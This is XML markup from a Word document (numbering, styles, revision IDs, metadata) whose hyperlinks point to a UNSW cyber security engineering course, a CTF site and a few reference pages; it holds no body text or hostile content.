      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="2FFB5C29"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D3E0C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23DB14"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="58F04830"/>
    <w:lvl w:ilvl="0" w:tplc="D4CE8E94">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="6690424C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="AD426FA0">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="F1084880">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="EDDEEB3E">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="2C9019BC">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="A8425D6E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="A3905324">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="EF680EC4">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="5D566498"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E7CE6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F87F36"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="3AE2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0B3BCB"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="66E27918"/>
    <w:lvl w:ilvl="0" w:tplc="8092D73A">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757A9A20"/>
    <w:multiLevelType w:val="hybridMultilevel"/>
    <w:tmpl w:val="B212E0C6"/>
    <w:lvl w:ilvl="0" w:tplc="98A2ED60">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%1."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="720" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="1" w:tplc="03563B6C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%2."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="1440" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="2" w:tplc="1F0EB64A">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%3."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="2160" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="3" w:tplc="BF1646A4">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%4."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="2880" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="4" w:tplc="64161FD8">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%5."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="3600" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="5" w:tplc="0928C48C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%6."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="4320" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="6" w:tplc="B4628D5E">
      <w:start w:val="1"/>
      <w:numFmt w:val="decimal"/>
      <w:lvlText w:val="%7."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5040" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="7" w:tplc="EE84FC2C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerLetter"/>
      <w:lvlText w:val="%8."/>
      <w:lvlJc w:val="left"/>
      <w:pPr>
        <w:ind w:left="5760" w:hanging="360"/>
      </w:pPr>
    </w:lvl>
    <w:lvl w:ilvl="8" w:tplc="A606B80C">
      <w:start w:val="1"/>
      <w:numFmt w:val="lowerRoman"/>
      <w:lvlText w:val="%9."/>
      <w:lvlJc w:val="right"/>
      <w:pPr>
        <w:ind w:left="6480" w:hanging="180"/>
      </w:pPr>
    </w:lvl>
  </w:abstractNum>
  <w:abstractNum w:abstractNumId="8" w15:restartNumberingAfterBreak="0">
    <w:nsid w:val="7A6A7E74"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="032E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76364">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="548495595">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2077703631">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="1117984316">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1129320367">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="755437397">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1805536101">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1094784343">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="7910244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01743"/>
    <w:rsid w:val="0002725D"/>
    <w:rsid w:val="00031E5F"/>
    <w:rsid w:val="000439B8"/>
    <w:rsid w:val="00061133"/>
    <w:rsid w:val="000B00DE"/>
    <w:rsid w:val="00105939"/>
    <w:rsid w:val="00163D99"/>
    <w:rsid w:val="001739A4"/>
    <w:rsid w:val="0018464D"/>
    <w:rsid w:val="001D05E8"/>
    <w:rsid w:val="001D4E4C"/>
    <w:rsid w:val="001F15FB"/>
    <w:rsid w:val="001F6C67"/>
    <w:rsid w:val="0020629E"/>
    <w:rsid w:val="00214FA8"/>
    <w:rsid w:val="00244F69"/>
    <w:rsid w:val="002963B1"/>
    <w:rsid w:val="002A2112"/>
    <w:rsid w:val="002D1807"/>
    <w:rsid w:val="002F080E"/>
    <w:rsid w:val="00302EA8"/>
    <w:rsid w:val="003032B0"/>
    <w:rsid w:val="003123C6"/>
    <w:rsid w:val="0031712A"/>
    <w:rsid w:val="003317F4"/>
    <w:rsid w:val="003362CA"/>
    <w:rsid w:val="00353511"/>
    <w:rsid w:val="003567E5"/>
    <w:rsid w:val="003658AB"/>
    <w:rsid w:val="0038476D"/>
    <w:rsid w:val="003A1FD7"/>
    <w:rsid w:val="003A4F61"/>
    <w:rsid w:val="003A7BCC"/>
    <w:rsid w:val="003F1846"/>
    <w:rsid w:val="00426E56"/>
    <w:rsid w:val="00433997"/>
    <w:rsid w:val="004458A6"/>
    <w:rsid w:val="00450A42"/>
    <w:rsid w:val="00473801"/>
    <w:rsid w:val="00487CBB"/>
    <w:rsid w:val="004C66A1"/>
    <w:rsid w:val="004D16C5"/>
    <w:rsid w:val="004F7A69"/>
    <w:rsid w:val="00511DF2"/>
    <w:rsid w:val="005251A5"/>
    <w:rsid w:val="00553FBC"/>
    <w:rsid w:val="005617B7"/>
    <w:rsid w:val="00561E9D"/>
    <w:rsid w:val="005656F6"/>
    <w:rsid w:val="005661E4"/>
    <w:rsid w:val="0058592F"/>
    <w:rsid w:val="005A08DC"/>
    <w:rsid w:val="005A1FC7"/>
    <w:rsid w:val="005B73AE"/>
    <w:rsid w:val="005E24F1"/>
    <w:rsid w:val="006157CB"/>
    <w:rsid w:val="00652DFD"/>
    <w:rsid w:val="006576AD"/>
    <w:rsid w:val="00660261"/>
    <w:rsid w:val="006665A1"/>
    <w:rsid w:val="006E5CDE"/>
    <w:rsid w:val="00717063"/>
    <w:rsid w:val="0075256C"/>
    <w:rsid w:val="0076778C"/>
    <w:rsid w:val="00790B88"/>
    <w:rsid w:val="007A2B7C"/>
    <w:rsid w:val="007B4CBA"/>
    <w:rsid w:val="007C100A"/>
    <w:rsid w:val="007E5820"/>
    <w:rsid w:val="00812199"/>
    <w:rsid w:val="00831FB7"/>
    <w:rsid w:val="008825CF"/>
    <w:rsid w:val="008976B6"/>
    <w:rsid w:val="008A5A2F"/>
    <w:rsid w:val="008A7E74"/>
    <w:rsid w:val="008B59EF"/>
    <w:rsid w:val="00901E67"/>
    <w:rsid w:val="00903D82"/>
    <w:rsid w:val="00945C5C"/>
    <w:rsid w:val="0098788C"/>
    <w:rsid w:val="009D10E4"/>
    <w:rsid w:val="009D5A48"/>
    <w:rsid w:val="00A1213F"/>
    <w:rsid w:val="00A13563"/>
    <w:rsid w:val="00A3718C"/>
    <w:rsid w:val="00A51BAD"/>
    <w:rsid w:val="00A5771B"/>
    <w:rsid w:val="00A843F5"/>
    <w:rsid w:val="00A90EF5"/>
    <w:rsid w:val="00AA46C9"/>
    <w:rsid w:val="00AB26CD"/>
    <w:rsid w:val="00AC1CEF"/>
    <w:rsid w:val="00AE14A7"/>
    <w:rsid w:val="00AF1C36"/>
    <w:rsid w:val="00B51443"/>
    <w:rsid w:val="00B55423"/>
    <w:rsid w:val="00B9480E"/>
    <w:rsid w:val="00B9509C"/>
    <w:rsid w:val="00BE4F31"/>
    <w:rsid w:val="00C0097A"/>
    <w:rsid w:val="00C068A8"/>
    <w:rsid w:val="00C27111"/>
    <w:rsid w:val="00C536AF"/>
    <w:rsid w:val="00C54874"/>
    <w:rsid w:val="00C713E8"/>
    <w:rsid w:val="00CA4D29"/>
    <w:rsid w:val="00D44FAA"/>
    <w:rsid w:val="00D83FA9"/>
    <w:rsid w:val="00DC4C82"/>
    <w:rsid w:val="00DE490B"/>
    <w:rsid w:val="00E003A3"/>
    <w:rsid w:val="00E05570"/>
    <w:rsid w:val="00E11AEA"/>
    <w:rsid w:val="00E36FBA"/>
    <w:rsid w:val="00E45EA2"/>
    <w:rsid w:val="00E56622"/>
    <w:rsid w:val="00E630CD"/>
    <w:rsid w:val="00E838A9"/>
    <w:rsid w:val="00E91064"/>
    <w:rsid w:val="00E9362C"/>
    <w:rsid w:val="00EB538C"/>
    <w:rsid w:val="00ED5F6D"/>
    <w:rsid w:val="00EF26E3"/>
    <w:rsid w:val="00F042BF"/>
    <w:rsid w:val="00F12C98"/>
    <w:rsid w:val="00F1361F"/>
    <w:rsid w:val="00F33663"/>
    <w:rsid w:val="00F34953"/>
    <w:rsid w:val="00F46C7D"/>
    <w:rsid w:val="00F5572B"/>
    <w:rsid w:val="00F94604"/>
    <w:rsid w:val="00FA08D1"/>
    <w:rsid w:val="00FA64B7"/>
    <w:rsid w:val="00FB0A49"/>
    <w:rsid w:val="00FB2563"/>
    <w:rsid w:val="0142DCDE"/>
    <w:rsid w:val="018EE3D7"/>
    <w:rsid w:val="019AD614"/>
    <w:rsid w:val="02E3CFBE"/>
    <w:rsid w:val="0546131A"/>
    <w:rsid w:val="0600612C"/>
    <w:rsid w:val="06B17308"/>
    <w:rsid w:val="078AB874"/>
    <w:rsid w:val="08C796BA"/>
    <w:rsid w:val="0DA0FC93"/>
    <w:rsid w:val="0E2B4E8C"/>
    <w:rsid w:val="0E407A08"/>
    <w:rsid w:val="0E559CEF"/>
    <w:rsid w:val="1098DFCA"/>
    <w:rsid w:val="12997F7D"/>
    <w:rsid w:val="13D4C4C5"/>
    <w:rsid w:val="141A93D7"/>
    <w:rsid w:val="14E6EADD"/>
    <w:rsid w:val="1503DF44"/>
    <w:rsid w:val="155554D3"/>
    <w:rsid w:val="15928116"/>
    <w:rsid w:val="16168886"/>
    <w:rsid w:val="169D7522"/>
    <w:rsid w:val="181B8E52"/>
    <w:rsid w:val="186127A6"/>
    <w:rsid w:val="1AE53E51"/>
    <w:rsid w:val="1B35AEF7"/>
    <w:rsid w:val="1B8583FD"/>
    <w:rsid w:val="1C43A36D"/>
    <w:rsid w:val="1C8EE1DB"/>
    <w:rsid w:val="1CC00C75"/>
    <w:rsid w:val="1D136FCE"/>
    <w:rsid w:val="1FE2BA0C"/>
    <w:rsid w:val="20427107"/>
    <w:rsid w:val="21633C8C"/>
    <w:rsid w:val="21A91BA0"/>
    <w:rsid w:val="23DCD9F8"/>
    <w:rsid w:val="25F34E4C"/>
    <w:rsid w:val="2890882B"/>
    <w:rsid w:val="29C051EC"/>
    <w:rsid w:val="2ACF105E"/>
    <w:rsid w:val="2B194D2C"/>
    <w:rsid w:val="2B29D56B"/>
    <w:rsid w:val="2C039CBC"/>
    <w:rsid w:val="2C2B811B"/>
    <w:rsid w:val="2C4FC874"/>
    <w:rsid w:val="2CF98C07"/>
    <w:rsid w:val="2D55BC5E"/>
    <w:rsid w:val="2D6900C1"/>
    <w:rsid w:val="2E6E7AC1"/>
    <w:rsid w:val="2F3A1CC1"/>
    <w:rsid w:val="30B419A8"/>
    <w:rsid w:val="30DB412C"/>
    <w:rsid w:val="30F1F342"/>
    <w:rsid w:val="316224EB"/>
    <w:rsid w:val="3297DC1F"/>
    <w:rsid w:val="336AB2E5"/>
    <w:rsid w:val="35222D9E"/>
    <w:rsid w:val="371C62D3"/>
    <w:rsid w:val="3722A2DC"/>
    <w:rsid w:val="3730D899"/>
    <w:rsid w:val="37D07EEC"/>
    <w:rsid w:val="382CF1D2"/>
    <w:rsid w:val="391D54D3"/>
    <w:rsid w:val="39809BE9"/>
    <w:rsid w:val="398470B6"/>
    <w:rsid w:val="3B0F2F59"/>
    <w:rsid w:val="3B3B092D"/>
    <w:rsid w:val="3C2776BD"/>
    <w:rsid w:val="3C56E03E"/>
    <w:rsid w:val="3D9D0607"/>
    <w:rsid w:val="3E737628"/>
    <w:rsid w:val="3F2B0098"/>
    <w:rsid w:val="3F828AD0"/>
    <w:rsid w:val="41548045"/>
    <w:rsid w:val="42A57885"/>
    <w:rsid w:val="42D4980C"/>
    <w:rsid w:val="42E83AC9"/>
    <w:rsid w:val="43A14A5A"/>
    <w:rsid w:val="44908FCC"/>
    <w:rsid w:val="45ACF387"/>
    <w:rsid w:val="4616B9A0"/>
    <w:rsid w:val="4657ADB4"/>
    <w:rsid w:val="46CD8C25"/>
    <w:rsid w:val="46FCCB50"/>
    <w:rsid w:val="4754C4D8"/>
    <w:rsid w:val="4A6EB47B"/>
    <w:rsid w:val="4C7EF474"/>
    <w:rsid w:val="4C8FA85B"/>
    <w:rsid w:val="50317446"/>
    <w:rsid w:val="511C71F7"/>
    <w:rsid w:val="5146400E"/>
    <w:rsid w:val="51A4F042"/>
    <w:rsid w:val="52A3F398"/>
    <w:rsid w:val="53506ABB"/>
    <w:rsid w:val="536A708A"/>
    <w:rsid w:val="53B92277"/>
    <w:rsid w:val="543CD94A"/>
    <w:rsid w:val="55216E6C"/>
    <w:rsid w:val="55390D8F"/>
    <w:rsid w:val="5557D4A9"/>
    <w:rsid w:val="5590C850"/>
    <w:rsid w:val="55D0B4D2"/>
    <w:rsid w:val="566E02A6"/>
    <w:rsid w:val="592CA103"/>
    <w:rsid w:val="59BFA03D"/>
    <w:rsid w:val="5AF8CDE6"/>
    <w:rsid w:val="5C182900"/>
    <w:rsid w:val="5ED7D080"/>
    <w:rsid w:val="5F245F19"/>
    <w:rsid w:val="60E4267D"/>
    <w:rsid w:val="61EF3C9A"/>
    <w:rsid w:val="62319522"/>
    <w:rsid w:val="62CCBAE5"/>
    <w:rsid w:val="64F38000"/>
    <w:rsid w:val="6513D53F"/>
    <w:rsid w:val="6685B08B"/>
    <w:rsid w:val="66F26DFD"/>
    <w:rsid w:val="6816F7BF"/>
    <w:rsid w:val="68CB2D18"/>
    <w:rsid w:val="6AF0240F"/>
    <w:rsid w:val="6B214FDA"/>
    <w:rsid w:val="6C33C20C"/>
    <w:rsid w:val="6C805450"/>
    <w:rsid w:val="6E78A25E"/>
    <w:rsid w:val="703CBDFD"/>
    <w:rsid w:val="714DC6FA"/>
    <w:rsid w:val="72655377"/>
    <w:rsid w:val="73EA0038"/>
    <w:rsid w:val="798B5A01"/>
    <w:rsid w:val="7B7E572D"/>
    <w:rsid w:val="7BD61530"/>
    <w:rsid w:val="7BD990C2"/>
    <w:rsid w:val="7C7DC266"/>
    <w:rsid w:val="7CF86664"/>
    <w:rsid w:val="7D1EA43D"/>
    <w:rsid w:val="7DC3C52F"/>
    <w:rsid w:val="7DEE4269"/>
    <w:rsid w:val="7E62B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42D4980C"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Footer">
    <w:name w:val="footer"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="42D4980C"/>
    <w:pPr>
      <w:tabs>
        <w:tab w:val="center" w:pos="4680"/>
        <w:tab w:val="right" w:pos="9360"/>
      </w:tabs>
      <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
    </w:pPr>
  </w:style>
  <w:style w:type="character" w:styleId="UnresolvedMention">
    <w:name w:val="Unresolved Mention"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00AB26CD"/>
    <w:rPr>
      <w:color w:val="605E5C"/>
      <w:shd w:val="clear" w:color="auto" w:fill="E1DFDD"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="CommentReference">
    <w:name w:val="annotation reference"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00903D82"/>
    <w:rPr>
      <w:sz w:val="16"/>
      <w:szCs w:val="16"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentText">
    <w:name w:val="annotation text"/>
    <w:basedOn w:val="Normal"/>
    <w:link w:val="CommentTextChar"/>
    <w:uiPriority w:val="99"/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00903D82"/>
    <w:pPr>
      <w:spacing w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentTextChar">
    <w:name w:val="Comment Text Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="CommentText"/>
    <w:uiPriority w:val="99"/>
    <w:rsid w:val="00903D82"/>
    <w:rPr>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-AU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="CommentSubject">
    <w:name w:val="annotation subject"/>
    <w:basedOn w:val="CommentText"/>
    <w:next w:val="CommentText"/>
    <w:link w:val="CommentSubjectChar"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00903D82"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="CommentSubjectChar">
    <w:name w:val="Comment Subject Char"/>
    <w:basedOn w:val="CommentTextChar"/>
    <w:link w:val="CommentSubject"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00903D82"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
      <w:sz w:val="20"/>
      <w:szCs w:val="20"/>
      <w:lang w:val="en-AU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Strong">
    <w:name w:val="Strong"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="22"/>
    <w:qFormat/>
    <w:rsid w:val="00903D82"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="css-emb99l">
    <w:name w:val="css-emb99l"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="00903D82"/>
    <w:pPr>
      <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
    </w:pPr>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:lang w:eastAsia="en-AU"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="PlaceholderText">
    <w:name w:val="Placeholder Text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:rsid w:val="00903D82"/>
    <w:rPr>
      <w:color w:val="666666"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="FollowedHyperlink">
    <w:name w:val="FollowedHyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="001D4E4C"/>
    <w:rPr>
      <w:color w:val="96607D" w:themeColor="followedHyperlink"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Caption">
    <w:name w:val="caption"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:uiPriority w:val="35"/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="005E24F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penlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/securityeverywhere/securityeverywhere3/?cl=1" TargetMode="External"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www-nature-com.wwwproxy1.library.unsw.edu.au/articles/d41586-021-02634-z" TargetMode="External"/><Relationship Id="rId18" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.cpubenchmark.net/laptop.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www.openlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/activities/cognitivevulns/?cl=1" TargetMode="External"/><Relationship Id="rId17" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.openlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/activities/attackerwork/?cl=1" TargetMode="External"/><Relationship Id="rId25" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.openlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/casestudies/week-3-houdini-prep/?cl=1"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ctfd.comp6841.xyz/"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nsidegnss.com/codes-the-prn-family-grows-again/" TargetMode="Externa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yperlink" Target="https://www.openlearning.com/unswcourses/courses/cyber-security-engineering-2026-t2/activities/enigma/?cl=1" TargetMode="External"/><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https://www.cpubenchmark.net/common_cpus.html"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13D053-01F1-4C63-B5AF-1F2B15F5D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826</TotalTime>
  <Pages>11</Pages>
  <Words>1978</Words>
  <Characters>11138</Characters>
  <Application>Microsoft Office Word</Application>
  <DocSecurity>0</DocSecurity>
  <Lines>412</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123</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-03-28T06:23:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-06-21T22:58:00Z</dcterms:modified>
</cp:coreProperties>
</file>